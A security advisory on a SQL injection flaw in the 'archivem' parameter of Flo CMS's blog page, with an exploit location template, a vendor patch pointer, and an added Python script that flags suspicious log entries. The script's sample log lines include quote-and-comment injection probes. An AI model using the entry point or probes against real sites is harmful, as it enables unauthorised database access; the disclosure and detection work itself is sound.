Release date: 2013-09-05
Updated on: 2013-09-08
Affected Systems:
Flo CMS
Description:
--------------------------------------------------------------------------------
Flo CMS is a content management system.
Flo CMS does not properly filter the "archivem" GET parameter of /blog/index.asp. Remote attackers can exploit this vulnerability to run SQL queries by injecting arbitrary SQL code.
<* Source: Ashiyane Digital Security Team
Link: http://secunia.com/advisories/54678/
http://packetstormsecurity.com/files/123058/Flo-CMS-SQL-Injection.html
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
# [+] Exploit:
#
# [+] Location: [Target]/blog/index.asp?archivem=[SQL Injection]
#
#-------
# Proof:
#-------
#
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Flo CMS
-------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
http://www.flocms.ie
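
Operators who ran an unpatched Flo CMS can check web server logs for requests to /blog/index.asp whose "archivem" value does not look like a normal archive selector. The following is an added example, not part of the original advisory or of Flo CMS; the log layout, the sample lines and the assumption that legitimate archivem values are short digit strings are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Constructed IIS W3C-style log lines
# (fields: date time c-ip method uri-stem uri-query status).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2013-09-06 10:01:12 203.0.113.5 GET /blog/index.asp archivem=8 200
2013-09-06 10:01:40 203.0.113.9 GET /blog/index.asp ArchiveM=%27 500
2013-09-06 10:02:03 203.0.113.9 GET /Blog/Index.asp archivem=8%27-- 200
2013-09-06 10:02:30 198.51.100.7 GET /news/index.asp archivem=%27 404
2013-09-06 10:03:00 198.51.100.7 GET /blog/index.asp page=2 200
"""

TARGET_STEM = "/blog/index.asp"
PARAM = "archivem"
# Assumption: a legitimate value is a short run of digits (month or year-month).
EXPECTED = re.compile(r"\d{1,6}")


def suspicious_requests(log_text):
    """Return (client_ip, decoded_value, status) for off-pattern archivem values."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        # Skip W3C directive lines and anything that is not a 7-field record.
        if line.startswith("#") or len(fields) != 7:
            continue
        _date, _time, ip, _method, stem, query, status = fields
        # IIS paths and ASP query-string names are case-insensitive.
        if stem.lower() != TARGET_STEM:
            continue
        # parse_qsl URL-decodes, so %27 is compared as a single quote.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name.lower() == PARAM and not EXPECTED.fullmatch(value):
                hits.append((ip, value, int(status)))
    return hits


if __name__ == "__main__":
    for ip, value, status in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} status={status} archivem={value!r}")
```

A 500 response next to an off-pattern value suggests the input reached the database layer and is worth correlating with database error logs.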